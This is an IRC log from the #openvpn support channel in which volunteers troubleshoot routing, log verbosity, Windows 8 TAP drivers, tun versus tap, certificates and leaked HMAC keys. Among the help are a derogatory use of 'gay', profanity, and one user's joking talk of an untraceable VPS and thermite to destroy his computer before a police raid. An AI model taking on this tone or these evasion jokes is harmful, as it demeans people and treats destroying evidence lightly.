[~novaflash@vpnserver1.jellemaautomatisering.nl] has joined #openvpn 19:20 <@ecrist> yup 19:20 < zach> I just want to confirm, I do the routes on my server, push routes to each client via openvpn? 19:20 <@ecrist> yup 19:20 < zach> or routes on server + routes on each client manually 19:20 < zach> either will work, I imagine 19:20 <@ecrist> and pass iroute for the client with the routes behind 19:21 < zach> awesome 19:21 < zach> I knew I was on the right track, some times you just need confirmation 19:21 < zach> I appreciate it ecrist 19:25 <@ecrist> :) 19:26 < zach> far more simple than I expected too, good to know about iroute 19:27 < baobeiiii_> ach my openvpn log is 2Mb after just 1 day running 19:27 -!- zz_AsadH is now known as AsadH 19:27 < zach> mine is ~50 for less than a week, very busy server 19:28 < baobeiiii_> mine has only 2 clients 19:28 < baobeiiii_> its because of an error message that occurs every 60 seconds 19:29 < zach> whats the error message/ 19:29 -!- raidz is now known as raidz_away 19:29 < baobeiiii_> pekster mentioned how to stop the error message from being logged but at the time I didn't take notes ;) 19:32 < plut0> getting this proxy error when trying to connect, "received corrupted data from proxy server" 19:38 < plut0> is there no fix? 19:41 < baobeiiii_> zach, waiting on the file to open so i can paste it 19:41 < baobeiiii_> something about an ip packet with type 15 19:44 -!- jtrimmer [~jtrimmer@75-151-66-133-WestFlorida.hfc.comcastbusiness.net] has joined #openvpn 19:50 < jtrimmer> I know I can redirect all internet traffic through the vpn but is there a way to push a route or option to make a client lan ip redirect only it's internet traffic through the vpn? 19:57 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Quit: Leaving] 19:58 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 20:00 < AndrewX192> jtrimmer: set your default gateway according, and and a static route for your local network 20:11 <@ecrist> baobeiiii_: what do you have for verb in your config? 20:13 < baobeiiii_> i set it to 6 20:23 <@ecrist> that's why 20:24 <@ecrist> a working VPN only needs a 2 or 3 20:24 <@ecrist> we consider 5 "very verbose" 20:25 < plut0> anyone have a fix for this proxy issue? "received corrupted data from proxy server" 20:25 <@ecrist> !logs 20:25 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 20:25 <@ecrist> !configs 20:25 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 20:25 <@ecrist> plut0: see above 20:32 < dbhaber_> yawn 20:32 < dbhaber_> ecrist: i am going to do my best to get active and keep the forums pruned 20:32 < dbhaber_> i just nuked a half dozen spam posts today 20:32 < dbhaber_> im happy to see its getting good use 20:33 < dbhaber_> how did my nick end pu with a _ 20:33 < dbhaber_> up 20:33 < dbhaber_> how the f does someone own this 20:34 <@ecrist> 16:59:43 -!- dbhaber_ [me@208.99.80.128] has joined #openvpn 20:34 <@ecrist> 17:00:24 -!- dbhaber [me@208.99.80.128] has quit [Read error: Connection reset by peer] 20:34 <@ecrist> that's why 20:40 <+hazardous> is that dougy 20:44 < dbhaber_> i see 20:44 < dbhaber_> apparently someone owns this nick 20:44 < dbhaber_> hazardous: who are you? 20:47 <@ecrist> dbhaber_: nobody owns that nick, you just had a connection failure 20:49 < pekster> That said, you're free to register the nick with nickserv if you'd like to maintain official ownership of it: https://www.freenode.net/faq.shtml#userregistration 20:49 <@vpnHelper> Title: freenode: frequently-asked questions (at www.freenode.net) 20:50 < pekster> (You'll want to change your nick first, unless you actually wanted the trailing underscore ;) 20:50 <@ecrist> dbhaber_: that said, the person who registered Dougy used it for 2 weeks and hasn't been seen in 6 months 20:50 <@ecrist> so, go to #freenode and ask them to release the nick 20:52 <+hazardous> dbhaber_: i occasionally browse wht, not a member though 20:52 < dbhaber_> ah 20:52 < dbhaber_> yeah, that is me 20:52 < dbhaber_> that cesspool 20:53 <@ecrist> what cesspool? 20:53 < dbhaber_> wht 20:53 < dbhaber_> www.wht.us 20:53 <@ecrist> gay\ 20:54 <@ecrist> dbhaber_: did you see my new car? 20:55 < dbhaber_> ecrist: ha 20:55 < dbhaber_> i haven't talked to you in like 2 years motherf'er 20:55 < dbhaber_> lets see it 20:55 <@ecrist> http://secure-computing.net/files/bmw.jpg 20:55 < dbhaber_> http://images.thetruthaboutcars.com/2008/12/4x4metro.jpg 20:55 < dbhaber_> is this it? 20:55 < dbhaber_> hey, not bad 20:56 < dbhaber_> what year 20:56 <@ecrist> 2013 20:56 < dbhaber_> tbh, I have nothing against BMW 20:56 < dbhaber_> I just won't ever own one 20:56 <@ecrist> took delivery Nov 13 20:56 < dbhaber_> that's a car that someone with a bunch of money has 20:56 < dbhaber_> I have a 2010 Hyundai Sonata, decent car 20:56 < dbhaber_> it was cheap 20:56 < dbhaber_> very cheap 20:57 <@ecrist> no, what I have is a car that someone who USED TO have a bunch of money, has 20:57 < dbhaber_> true 20:57 < dbhaber_> :) 20:57 < dbhaber_> My car was 12k with 24k on the clock 20:57 <@ecrist> that being said, it's fan fucking tastic 20:57 < dbhaber_> heh 20:57 < dbhaber_> I'm not sure what car I want next 20:57 <@ecrist> mine was $64,450 with 11 miles on the clock 20:57 < dbhaber_> Putting money away now.. my next investment is either going to be a house or a nice car in 2-3 years 20:57 < dbhaber_> well, that's a lot of money 20:58 < dbhaber_> that's probably the total i've earned in my entire life 20:58 <@ecrist> heh, I'm sure you've earned more, but just barely. :P 20:58 < dbhaber_> i like driving my friend's car 20:58 < dbhaber_> these are both his 20:58 < dbhaber_> https://sphotos-b.xx.fbcdn.net/hphotos-ash3/553414_4730163253724_52285560_n.jpg 20:58 < dbhaber_> or rather one is his and one is his brother's 20:59 < dbhaber_> he just bought a range rover and a 2013 M3 and a Bentley 20:59 <@ecrist> you have wealthy friends 21:00 < dbhaber_> For a 20 year old who isn't a valet, I've driven some cool cars. Driven a Lamborghini LP640 and Aventador, a Ferrari California from the late 2000's 21:00 < dbhaber_> ecrist: Just a couple. I don't make much money. 21:01 < dbhaber_> I work for $25/hr now which is good for 20 years old I suppose.. plus a $1500/mo side job.. well, it's a $1500/mo retainer salary but some months i dont work a tall.. others i work 6-10 hours 21:01 <@ecrist> not doing too shappy 21:01 <@ecrist> shabby* 21:02 <@ecrist> that's 50k/year 21:02 < dbhaber_> Coudl be doing better 21:02 < dbhaber_> My firend offered me to go into business with this IT gig he was doing in NYC 21:02 <@ecrist> and so could I 21:02 < dbhaber_> he just turned 19, 100k in the bank, equity in a few pretty large companies, 100k+ salary 21:02 < dbhaber_> i coulda had 30% 21:03 < dbhaber_> but i was still in HS when it started like he was, but he went to HS in NYC i believe.. and i did in NJ. so he was just a MTA ride away from work, I was a 30+ minute commute after HS.. didnt make sense 21:11 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 21:11 -!- mode/#openvpn [+o krzee] by ChanServ 21:14 -!- plut0 [~cory@pool-96-236-43-69.albyny.fios.verizon.net] has left #openvpn [] 21:15 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 21:16 -!- mikey_w [~mike@71.63.115.202] has quit [Remote host closed the connection] 21:23 -!- KaiForce [~chatzilla@adsl-70-228-64-42.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]] 21:33 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 260 seconds] 21:35 -!- baobeiiii [~baobeiiii@192.73.244.224] has joined #openvpn 21:37 < baobeiiii> zach, Tue Feb 19 22:34:25 2013 IP packet with unknown IP version=15 seen 21:38 -!- baobeiiii_ [~baobeiiii@192.73.244.224] has quit [Ping timeout: 255 seconds] 21:49 -!- jtrimmer [~jtrimmer@75-151-66-133-WestFlorida.hfc.comcastbusiness.net] has quit [] 21:49 -!- baobeiiii_ [~baobeiiii@180.155.14.35] has joined #openvpn 21:53 -!- baobeiiii [~baobeiiii@192.73.244.224] has quit [Ping timeout: 248 seconds] 22:03 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 22:07 -!- MaxDamage [Damage@46.238.18.82] has joined #openvpn 22:07 -!- NChief [tomme@unaffiliated/nchief] has quit [Ping timeout: 248 seconds] 22:07 < MaxDamage> Hey guys. Anyone have issues with the openvpn TAP adapter under win8? It used to work great under win7. 22:07 < MaxDamage> Both x64, AMD. 22:08 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 22:08 < MaxDamage> It's not signed, so Windows is refusing to use it. 22:10 < MaxDamage> I guess my question would be, does anyone have a self-signed driver, since I can't really figure out how to sign my own :> 22:14 < pekster> The 2.3.0 release should have a signed driver, or at least it did when I installed it in the Win 8 developer preview prior to RTM (I don't have a copy myself) 22:14 < pekster> In my home Vista x64 installation, I get a prompt on first-install asking if I want to install the driver which is signed by "OpenVPN Technologies" 22:15 < pekster> Maybe check your local security policy on driver installation policy setting? 22:16 < MaxDamage> Yeah, I had that message in Windows 7 as well, but Windows 8 outright refuses to install it. 22:17 < pekster> You using the latest version/build? 2.3.0 build I004 is the latet 22:19 -!- brute11k1 [~brute11k@89.249.235.210] has joined #openvpn 22:19 < MaxDamage> Let me see... 22:20 < MaxDamage> hm, for some reason it's 2.0.9 22:20 < pekster> That version is years old 22:20 < pekster> You really ought to use a more recent version 22:20 < MaxDamage> lol 22:20 < MaxDamage> yeah 22:20 < pekster> Circa 2006 ;) 22:21 < pekster> I can almost guarentee that's your issue 22:21 < pekster> http://openvpn.net/index.php/open-source/downloads.html 22:21 <@vpnHelper> Title: Community Downloads (at openvpn.net) 22:21 < MaxDamage> Hahaha, oh wow 22:21 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 244 seconds] 22:21 < MaxDamage> Yeah, that's it. 22:21 < MaxDamage> I don't know why, but Google took me to openvpn.se 22:22 < MaxDamage> I haven't really done anything with it for a year or so, so I don't remember how it went 22:22 < MaxDamage> Yup, it does work now. :) 22:25 < baobeiiii_> lol someone's actually using windows 8? 22:29 < baobeiiii_> pekster, hey, could you remind me of that way to remove the message from being posted in the log 22:29 < baobeiiii_> i was too tired to take it in 22:32 < pekster> baobeiiii_: Reduce the log level blow what that message is set at (I don't know if verb 2 or 1 works, although that'll hide other messages too. Even at 'verb 0' critical errors are still logged.) Optionally, I suggested you use a logging daemon and filter it out 22:33 < dbhaber_> GOD DAMN 22:33 < dbhaber_> i hate windows 8 22:34 < pekster> baobeiiii_: You did correctly verify that it wasn't a --comp-lzo mis-match, right? Both the configs match exactly, and it's not getting added at one end through command-line values or such? 22:34 < MaxDamage> baobeiiii_, yeah, *actually* using windows 8 :> 22:34 < baobeiiii_> both configs match perfectly 22:36 < MaxDamage> Uhh, actually, where do I put the keys again? In config/? :3 22:37 < pekster> MaxDamage: \config\ is standard, although technically you can put them anywhere you'd like on the filesystem. The GUI will pick up .ovpn configs in sub-directories off the config dir too 22:37 < MaxDamage> Thanks, pekster. 22:37 < baobeiiii_> i'll ask in linux how to use a logging filter 22:37 < pekster> Yea, that's distro-specific and depends on your syslog package 22:38 < baobeiiii_> then i'll ask in centos ;) 22:38 < pekster> You'll want to ask how to filter out the message based on that specific text match, since you want other logs/warnings/errors from openvpn, presumably 22:38 < baobeiiii_> yep confirmed still getting it even with verb 1 22:39 < baobeiiii_> woke up today with a 2mb log file 22:39 < pekster> Well, technically 'verb 0' is valid too, but still logs critical errors. And TBH you're going to miss a lot of potentially useful stuff at verb 0 22:40 -!- baobeiiii_ is now known as register 22:40 -!- register is now known as baobeiiii 22:43 < MaxDamage> pekster, I should have 'client' in my client config, right? :> 22:44 < MaxDamage> Because I get this when trying to connect http://pastebin.com/9Z26JHq3 22:45 < MaxDamage> And this is the config: http://pastebin.com/nvWp056u 22:45 < MaxDamage> Edited the sample 22:45 < pekster> That error is worthless. Program logs are less worthless 22:46 < MaxDamage> Never mind, got it. The GUI itself produced no output, so I thought there wasn't any in the logs either. 22:46 < MaxDamage> My bad. 22:46 < MaxDamage> ;p 22:48 < MaxDamage> Okay, so this is a bit strange, now. http://pastebin.com/XycayjSF 22:50 < pekster> The GUI passes your decryption passphrase via the management channel, so that's normal 22:50 < pekster> ie: you must provide the password in the graphical box that comes up. The program's execution is halted (in a "hold" state) until it gets the necessary info 22:51 < MaxDamage> I'm not being asked for a password anywhere, though there is a change password option when I right click on the system tray icon. 22:52 < pekster> Is the config you pasted earlier still valid? 22:52 < MaxDamage> Yup. 22:52 < pekster> Ideally comments/whitespace should be removed, but I can grep them out too if you don't have a proper stream editor like sed/grep on hand to do it 22:52 < MaxDamage> I don't. :> 22:52 < MaxDamage> And thank you. 22:53 < pekster> Well, some sed turns your massive config into this: http://fpaste.org/ysuf/ 22:54 < pekster> If your private key is encrypted, it'll prompt you for a box to decrypt it, and that appears to be what is happening based on your logs; you should get a "password" box 22:54 < baobeiiii> i'm thiking if it is definetely related to comp lzo then maybe on the server its 'broken' 22:55 < MaxDamage> hahah 22:55 < pekster> baobeiiii: Post logs from 'verb 4' and include all the variable settings from both the client and server, since that'll tell what the comp-lzo settings are 22:55 < MaxDamage> Yes, I got it. It works now. 22:56 < MaxDamage> It took a while to get a DHCP address, though. 22:56 < pekster> Why use tap? 22:56 < pekster> !tunortap 22:56 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 22:56 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 22:57 < MaxDamage> pekster, it says Win32 TAP interface in ncpa.cpl 22:57 < MaxDamage> so I'd say tap 22:57 < pekster> No, your config 22:57 < MaxDamage> Also tap. 22:58 < pekster> You are operating in tap mode; why not use tun? Do you actaully need to pass Ethernet frames or do multicast across the tunnel? 22:58 < pekster> (if you don't know what those are, you don't need it) 22:58 < MaxDamage> Because I trust my vpn comrades to not screw with the network. :> 22:59 < MaxDamage> And since I'll probably have to get them on skype and teamviewer to have them join it in the first place, i don't think they can 22:59 < pekster> It's just a waste of overhead (packet size goes up) and network traffic as things like ARP broadcasts and link-broadcasts like NBNS waste space 22:59 < baobeiiii> pekster, it's very verbose! http://pastebin.com/q0CjBBDm 23:00 < pekster> skype and teamviewer are not Ethernet-level protocols; they work fine across a tun setup 23:00 < MaxDamage> pekster, I know, I just need it to walk them through the vpn installation. 23:00 -!- Devastator- [~devas@186.214.110.45] has joined #openvpn 23:00 < MaxDamage> Can you give me an example of an ethernet based protocol? 23:00 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 264 seconds] 23:01 < pekster> ARP, IPX, IPv6 Router-Announcements would be Ethernet protocols 23:03 < MaxDamage> LAN gaming is also an option, btw 23:03 < MaxDamage> and if we want to play Carmageddon 2, we need IPX 23:03 < MaxDamage> :> 23:04 < pekster> That's potentially valid then, although nothing modern uses IPX (no clue how old that game is.) fwiw, most games today work fine over tun too, you just can't expect the "find games on my LAN" feature to work since that ususally uses subnet broadcasts 23:06 < baobeiiii> noticed a few weird things in the server log reguarding dropped packets 23:07 < MaxDamage> pekster, yeah, it's release nov 30, 1998 23:08 < pekster> baobeiiii: Windows? wtf is it trying to source from fe80::/10? :( 23:08 < MaxDamage> And don't spare any technical details, I do low level support for an ISP in the UK. 23:08 < pekster> That OS is so stupid sometimes 23:09 < baobeiiii> my client is running windows 7 64 23:09 < baobeiiii> no idea what fe80 is 23:09 < pekster> MaxDamage: No, that's basically it. tun saves on overhead (ie: no need to encapsulate the Ethernet frame header in the payload) and doesn't waste UDP packets sending network broadcasts for crap like ARP/NBNS/uPnP/whatever-else-is-on-your-LAN 23:10 < MaxDamage> pekster, the main usage for the VPN would be, for now, secure communciation over IRC or voice protocols, http, ftp, DNS and things to that degree 23:10 < pekster> baobeiiii: IPv6 link-lcoal. Your openvpn config does not enable IPv6, so openvpn rightfully drops trafafic source from a protocol you don't even support over the link 23:11 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Read error: Connection reset by peer] 23:11 < pekster> MaxDamage: Right. Those are all above the IP protocol. tap=Ethernet, tun=IP 23:11 < MaxDamage> I see, yeah. 23:11 < MaxDamage> So tun would be far more secure too, then? 23:11 < pekster> It's not "wrong" to use tap, just a waste of overhead. If you're not actually bridging to your physical LAN then it's also completely a waste 23:12 < baobeiiii> i've disabled ipv6 on the adapter in windows, might fix that 23:12 < MaxDamage> lol 23:12 < pekster> baobeiiii: Yea, that's possible. I've also seen Windows use a source address from a LAN adapter across a Windows adapter too. That OS does the dumbest things someetimes 23:12 < MaxDamage> Nope, those will be independent networks 23:13 < pekster> Erm, source from a physical LAN NIC on the tun/tap device is what I meant 23:13 < pekster> Yea, if you're routing between them there's no need at all to use tap unless you actually wanted to do Ethernet-stuff strictly on the VPN. As soon as you route to another network you've passed the subnet barrier 23:14 < pekster> Ethernet/subnet broadcasts are strictly bound to the link-domainn (some higher-level protocols can relay across these boundries, but the broadcast itself is a Layer 2 thing) 23:15 < pekster> Your call, but I'd suggest you switch to tun. Besides possible gaming implications, nothing you've said requires tap. And even the games should work fine as long as you connect via server IP and not 'broadcast a lot to find game servers on my LAN' stuff 23:15 -!- AsadH is now known as zz_AsadH 23:16 < baobeiiii> pekster, that fixed that fe80 message 23:16 < baobeiiii> had ip6 unticked on wireless adapter im using but not on tap adapter 23:16 < baobeiiii> tun rather 23:16 < MaxDamage> Well, the switch seems fairly easy. Just edit the config. Thanks for the advice, though. :) Wish I could buy you a beer 23:16 < pekster> baobeiiii: What about the proto 15 spam? 23:16 < baobeiiii> still ongoing every 60 seconds 23:19 < baobeiiii> maybe i should try with comp lzo disabled 23:19 < baobeiiii> would show if its something to do with that 23:19 < pekster> baobeiiii: Hm, actually, I can't confirm the lzo setting on the client completely matches due to a bug in the 2.3.0 build that hides the info I want. However, it should be OK based on the config settings 23:19 < pekster> Are you launching via the included GUI? 23:19 < MaxDamage> pekster, strange. My log file is being spammed with "rWrWrW" in the end. 23:19 < baobeiiii> pekster, yes 23:19 < pekster> MaxDamage: Lower verbosity to 3 23:20 < MaxDamage> ah 23:20 < pekster> at >=5 you get 'rwRW' printed for every packet 23:20 < baobeiiii> a bug? please report it! 23:20 < baobeiiii> bug supposed to be gone by the final release 23:20 < baobeiiii> bugs* 23:20 < pekster> baobeiiii: Yea, I just discovered it today. It's a small problem that just hides the config printout from the logs, so it's not a huge deal outside of debugging implications 23:20 < pekster> It's on my todo list tonight 23:20 < baobeiiii> ah woops 23:21 < baobeiiii> the connection log i showed from my client was verb 3 not 4 23:21 < baobeiiii> so it wouldn't match the level of detail 23:21 < baobeiiii> ach no it was 4 lol 23:21 < pekster> The client still shows it's a 2.3.0 release, which won't do anything at verb 4 23:21 < baobeiiii> <--- tired 23:21 -!- Orbi [~opera@anon-163-27.vpn.ipredator.se] has joined #openvpn 23:21 < pekster> (basically, the release bug prevents 2.3.0 clients on Windows from treating verb 4 any differently than verb 3) 23:21 < baobeiiii> did you tell the devs? 23:21 < pekster> Dude... 23:21 < pekster> < pekster> It's on my todo list tonight 23:22 < pekster> If you want it done faster than "tonight" go submit a proper well-written bugreport yourself 23:22 < baobeiiii> no need to go agro 23:23 < baobeiiii> i meant to ask will u tell the devs 23:23 < pekster> Based on what I can see about the options strings from the client, it looks like both clients have the implicit 'adaptive' mode (line 480 to 481 in your paste) 23:25 < baobeiiii> lol my cents channel told me to fix the source of the problem rather than 'hide' it 23:25 < baobeiiii> centos* 23:26 < pekster> Right, that would be better 23:26 < baobeiiii> well if you can't, i'm 100% sure i can't 23:26 < pekster> I suggested yesterday you start the server without any clients at higher verb levels and see if you get per-packetk data from the source 23:26 < baobeiiii> i did 23:26 < baobeiiii> just the client verb 6 23:26 < pekster> I can'd reproduce your error, so I can't actually do anything from here 23:26 < baobeiiii> still got it 23:26 < pekster> You tried 6 23:26 < pekster> verb levels go up to 9 23:27 < pekster> (at least, I guess I haven't checked the upper bound) 23:27 < baobeiiii> if 1 3 4 and 6 show it of course 9 would 23:27 < pekster> No, packet-level debug 23:27 < pekster> Obviously you don't get developer debug output at verb 3... 23:27 < baobeiiii> ok, i didn't because you said it printed the keys or something, i'll try that now 23:27 < pekster> I'm not interseted in the error you see; I'm interested in debug output you currently don't see 23:27 < MaxDamage> pekster, when I do ifconfig in the server, the device is tun0. Does that mean that tap won't really work okay, or should I just stop being stupid? :> 23:28 < pekster> verb 7 shouldn't print the x509 keys, but it will print symmetric keys used 23:28 < baobeiiii> that's not too bad they change every hour 23:29 < pekster> Right. And ideally start with verb 7 (or try 8/9 for fun if you don't get useful results, just to see what you do get) without *any* client connected, since you apparently get that error before your first client even connects 23:29 < baobeiiii> i'll run it for 10 mins on levels 7,8,9 then make a superrrrrrr long pastebin 23:30 < pekster> MaxDamage: Linux/Unix server? traditionally 'tunX' is a tun device anad 'tapX' is a tap device. Techncially you can name them whatever you want, but naming a tap device 'tun0' would be very foolish 23:30 < MaxDamage> pekster, that's what opevpn did. 23:30 < pekster> Then it's tun; you need to match the setting on both ends of the connection or openvpn will refuse to connect 23:31 < MaxDamage> Yeah, that's what I'd wager too :> 23:31 < pekster> baobeiiii: a separate paste per verb level is preferred; the output is likely to be quite large, although without connected clients it might be somewhat sane. If you don't see the proto 15 error at those levels, the output probably won't be helpful to me (since we're trying to debug what leads up to that event specifically) 23:32 < pekster> MaxDamage: If you haven't seen it: 23:32 < pekster> !howto 23:32 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 23:32 < MaxDamage> Yeah, I've read it when I first tried out openvpn. It worked great. 23:33 < baobeiiii> pekster, ok, running verb 7 for 10 without client, already see the proto 15 and some interesting messages 23:34 < MaxDamage> pekster, great success. I can now ssh over the vpn. 23:35 < pekster> Better gpg-encrypt files you send over ssh so that encrypted file can be secured with ssh and can then be transported over a secured VPN tunnel. Just in case. 23:36 < MaxDamage> pekster, i heard you like encryption, etc :> 23:41 < baobeiiii> pekster, verb 7 log http://pastebin.com/PgJmTg6f 23:41 < baobeiiii> thanks for helping get to the bottom of it :) 23:42 < MaxDamage> yeah, pekster is a really nice guy 23:45 < MaxDamage> pekster, do you have any guides on how exactly keys and certs work? I can't really understand the regional assignment and why it has to match between server and client if i'm going to have clients from different areas of the world 23:45 < pekster> Why on earth are dozens of IPs trying to contact that host? :\ 23:46 < pekster> !x509 23:46 < pekster> !pki 23:46 <@vpnHelper> "pki" is (#1) http://openvpn.net/index.php/open-source/documentation/howto.html#pki for how to make your PKI stuff (ca, and certs) or (#2) Heres a basic rundown of how it works... The server, client, and ca certs are all signed by the same ca.key. The server and client use the ca.crt to check that eachother were signed by the right ca.key. Optionally, the client also checks that the server cert was 23:46 <@vpnHelper> signed specially as a server (see !servercert) 23:46 < pekster> MaxDamage: ^^ that 23:49 < pekster> baobeiiii: You might try running on a more obscure port, but all those "No TLS state for client" messages are apparently random hosts on the web trying to send data to your server and getting dropped when it doesn't match a connected client 23:50 < MaxDamage> pekster, that's all fine and dandy, but can I issue client keys with different regional assignment, or is that really not necessary or just plain silly? 23:50 < pekster> What is "regional assignment" ? 23:50 < MaxDamage> You know, when you generate a key, where it asks you for region, company name, etc 23:50 < baobeiiii> weird 23:51 < baobeiiii> that it would show up in openvpn log if they're not trying to connect as clients 23:51 < pekster> Oh, that's all cosmetic. My keys don't have anything defined except the CN 23:51 < pekster> MaxDamage: You can type "." when prompted for city/state/whatever if you use easy-rsa and it'll omit the field 23:52 < MaxDamage> I see. :> 23:52 < pekster> baobeiiii: Yea, exactly. But that's quite the asortment of IPs hitting your system. Apparently you're an "interesting" target 23:52 < pekster> All over the world too, from some whois lookups I'm doing on those IPs 23:53 < pekster> .ph, .no, .br 23:53 < MaxDamage> pekster, so it's usually wise to generate one key per client, so that I may revoke them if necessary 23:53 < pekster> Yup 23:53 < baobeiiii> are they trying to autheticate as actual clients or is it like those bots that try to ssh in all the time 23:54 < pekster> No, it is probably just some arbitrary UDP packet; you can't auth unless you have (or managed to steal/reverse-engineer) an x509 keypair 23:55 < pekster> I have several public systems that listen on UDP 1194, and they rarely, if ever, get stray packets. You're getting on the order of a dozen hits per minute 23:55 < MaxDamage> pekster, now that you mention that, how likely is it that the gubmint can crack encryption quickly? 23:55 < MaxDamage> I do plan on using protocol encryption as well, over the VPN 23:55 < pekster> Use 2048 bit keys or higher and the best annalysis is that the world's supercomputers all combined to attack you specifically could not do it 23:56 < MaxDamage> Yeah, I did generate them at 2048 23:56 < pekster> Of course, it's easier for $local_government to just raid your home in that event 23:56 < MaxDamage> I'm hoping my identity is never revealed for that to happen 23:56 < MaxDamage> :> 23:56 < MaxDamage> the VPS i have is given to me for free with zero registration in the host 23:57 < MaxDamage> so no way to trace me if i was to route out of the VPS and did things 23:57 < MaxDamage> though, i am saying these things over an unencrypted network ;_; 23:57 < pekster> The outer protocol can be used to see where a VPN connection originates, but not what the content of the communication is 23:57 < baobeiiii> nothing i can do about that, already have a firewall that drops everything except traffic bound for 22 and 1194 23:57 < baobeiiii> running at level 8 now 23:58 < MaxDamage> And by the time they need to raid me, I'd be paranoid enough to have thermite bombs ready to destroy my PC at any time at the flick of a button 23:58 < MaxDamage> so I should be fine 23:58 < MaxDamage> :> 23:58 < pekster> baobeiiii: Careful with verb 8; check it over to make sure it doesn't leak anything sensitive in the x509 private key; FYI, your verb 7 output had the HMAC keys, which is the --tls-auth stuff 23:58 < baobeiiii> MaxDamage, no need for physical damange just use truecrypt on your system drive or something 23:58 < baobeiiii> then after their investigation turns up nothing u can ask for your computer back 23:58 < MaxDamage> I'll be legally obligated to give them the keys, I think 23:59 < pekster> Not a real problem, although in theory with that someone could perform an auth attempt (it'll still fail unless they have a properly signed cert, though) 23:59 < baobeiiii> MaxDamage, you live in the UK? 23:59 < MaxDamage> No, Bulgaria 23:59 < baobeiiii> only country with jail time for not handing them over to my knowledge 23:59 < MaxDamage> but since we joined the EU, cyber laws have become iffy 23:59 < MaxDamage> datacentres were raided due to torrent trackers on them 23:59 < MaxDamage> the admins of those sites were also raided by spec ops with fully loaded MP5s pointed at their children --- Day changed Wed Feb 20 2013 00:00 < MaxDamage> so i'm not really taking chances here :> 00:00 < MaxDamage> regarding the pool of molten metal on the clay pot on my floor, i thought i was being robbed so i decided to destroy all my work 00:00 < MaxDamage> lol 00:07 < pekster> baobeiiii: source code says this in the comment about your 'No TLS state' errors: "This can occur due to bogus data or DoS packets." 00:07 < pekster> And that exactly matches what I suggested earlier 00:09 < baobeiiii> only kids or government would bother doing dos 00:10 < MaxDamage> lol 00:10 < MaxDamage> government is right 00:10 < MaxDamage> ours tried to dos our local torrent tracker 00:10 < MaxDamage> but didn't even use proper udp flood 00:10 < MaxDamage> so they just got firewalled :> 00:10 < baobeiiii> pekster, here's verb 8, i did spot proto 15 in there 00:10 < baobeiiii> http://pastebin.com/bmVSW4cY 00:11 < pekster> http://dpaste.org/kCKq6/ <-- the source function that's dropping your bogus/scan/DoS traffic 00:14 < pekster> baobeiiii: FYI, when we're done here, you should re-generate your ta.key file on all your infrastructure since it's been printed in plaintext. It's not your private key, but there's no point using an HMAC key if it's been in plaintext online 00:14 < pekster> (remember, that needs to match on each node, server and client alike) 00:14 < baobeiiii> thanks i'll do that 00:14 < pekster> Well, it *is* a private key, just not your private component of the X509 keypair 00:16 < baobeiiii> i dont see it in there 00:16 < baobeiiii> other than reference by its name secret.key 00:16 < pekster> Lines 289-294 on your latest (verb 8) paste. It was in at verb 7 too 00:20 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 00:20 < pekster> baobeiiii: More verbosity beyond the verb 8 output won't be of any more use; besides seeing that your server is being sent bogus packets from a variety of source countries/IPs, I don't really know any more than I did earlier. I'll have to dig in the source more tomorrow, but I still don't have a good answer why you're getting that 'unknown IP version=15' output :\ 00:21 -!- brute11k1 [~brute11k@89.249.235.210] has quit [Ping timeout: 276 seconds] 00:21 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 00:23 < pekster> baobeiiii: Were you the one that did werid stuff with netfilter to DNAT most of the entire port range to udp/1194? If so, that's possibly related (and you may want to change that to a smaller set of known-to-you random/obscure high ports) 00:23 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 00:24 < xtreme_> is it possible to create own openvpn gui? 00:24 < baobeiiii> pekster, yep lol 00:25 < baobeiiii> that could be the reason 00:25 < pekster> baobeiiii: Well, don't do that then. Use a more sane subset and you'll probably see that go away 00:25 < pekster> Maybe even all the unknown IP version=15 stuff too 00:26 < baobeiiii> only did that because china has some software that notices the tls handshake and after a short period of time blocks the port 00:26 < baobeiiii> this way i can just enter any random number in my client config without changing the server each time 00:26 < pekster> Right, but anyone who scans *any* of the 65k ports gets dumped to your ovpn instance 00:26 < baobeiiii> although eventually they just blocked the entire ip 00:26 < pekster> It's dropping the noise, but possibly by doing so spamming your logs 00:27 < baobeiiii> i'll change it to a 1000 range 00:27 < pekster> I'd do less than that even 00:27 < pekster> You clearly have shell access; just pick a small handful of non-contigious ports 00:28 < pekster> Otherwise you become a magnet for bot scans 00:28 < baobeiiii> i dont see why, i mean given my firewall setup and the hmac firewall, a port scan shows all ports including 1194 as closed 00:28 < pekster> xtreme_: Sure, you can write a frontend in whatever language you'd like. You can interact with the openvpn process via the management interface: 00:28 < baobeiiii> only port you can see open is 22 00:28 < 